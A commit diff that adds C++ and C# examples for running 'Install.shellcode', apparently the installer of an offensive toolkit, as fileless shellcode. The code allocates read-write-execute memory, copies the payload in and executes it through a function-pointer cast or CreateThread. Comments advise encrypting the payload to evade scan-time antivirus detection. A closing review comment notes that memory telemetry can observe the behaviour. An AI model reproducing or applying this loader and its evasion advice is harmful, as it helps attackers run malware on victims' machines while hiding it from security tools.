Documentation
bytecode77 committed Sep 1, 2022
1 parent 21ee0ac commit 42af739
Showing 3 changed files with 42 additions and 5 deletions.
Binary file modified Docs/Documentation.docx
Binary file not shown.
12 changes: 7 additions & 5 deletions Examples/InstallShellCode.cpp
@@ -2,22 +2,24 @@

// Example on how to use Install.shellcode

// Install.shellcode wraps up Install.exe in a way that it can be loaded and executed as shellcode
// Install.shellcode wraps up Install.exe in a way that it can be loaded and executed as shellcode.

int main()
{
// --- Elevated privileges required ---

// 1. Load Install.shellcode from resources or from a BYTE[]
// Ideally, encrypt the file and decrypt it here to avoid scantime detection
// Ideally, encrypt the file and decrypt it here to avoid scantime detection.
LPBYTE shellCode = ...

// 2. Make the shellcode RWX
// 2. Make the shellcode RWX.
DWORD oldProtect;
VirtualProtect(shellCode, shellCodeSize, PAGE_EXECUTE_READWRITE, &oldProtect);

// 3. Cast the buffer to a function pointer and execute it
// 3. Cast the buffer to a function pointer and execute it.
((void(*)())shellCode)();

// This is the fileless equivalent to executing Install.exe
// This is the fileless equivalent to executing Install.exe.

return 0;
}
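--- a/Examples/InstallShellCode.cs
+++ b/Examples/InstallShellCode.cs
@@ -0,0 +1,35 @@
+using System;
+using System.Runtime.InteropServices;
+
+// Example on how to use Install.shellcode
+
+// Install.shellcode wraps up Install.exe in a way that it can be loaded and executed as shellcode.
+
+public static class Program
+{
+public static void Main()
+{
+// --- Elevated privileges required ---
+
+// 1. Load Install.shellcode from resources or from a byte[]
+// Ideally, encrypt the file and decrypt it here to avoid scantime detection.
+byte[] shellCode = ...
+
+// 2. Create an RWX buffer with the shellcode.
+IntPtr buffer = VirtualAlloc(IntPtr.Zero, (IntPtr)shellCode.Length, 0x1000, 0x40);
+Marshal.Copy(shellCode, 0, buffer, shellCode.Length);
+
+// 3. Start the shellcode in a thread and wait until it terminated.
+IntPtr thread = CreateThread(IntPtr.Zero, 0, buffer, IntPtr.Zero, 0, out _);
+WaitForSingleObject(thread, 0xffffffff);
+
+// This is the fileless equivalent to executing Install.exe.
+}
+
+[DllImport("kernel32.dll")]
+private static extern IntPtr VirtualAlloc(IntPtr address, IntPtr size, int allocationType, int protect);
+[DllImport("kernel32.dll")]
+private static extern IntPtr CreateThread(IntPtr threadAttributes, uint stackSize, IntPtr startAddress, IntPtr parameter, uint creationFlags, out uint threadId);
+[DllImport("kernel32.dll")]
+private static extern uint WaitForSingleObject(IntPtr handle, uint milliseconds);
+}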
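Review bot: The Win32 calls in `Main` pass bare literals (`0x1000`, `0x40`, `0xffffffff`), so a reader has to know the Windows headers to see what steps 2 and 3 actually request. I would declare them in `Program`, e.g. `private const int MemCommit = 0x1000, PageExecuteReadWrite = 0x40;` and `private const uint Infinite = 0xffffffff;`, and use the names in the `VirtualAlloc` and `WaitForSingleObject` calls. Spelled out, the example documents that it makes a private read-write-execute allocation and starts a thread inside it, which is the runtime behaviour that memory and API telemetry can observe. The "scantime" comment in step 1 concerns only the file at rest.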
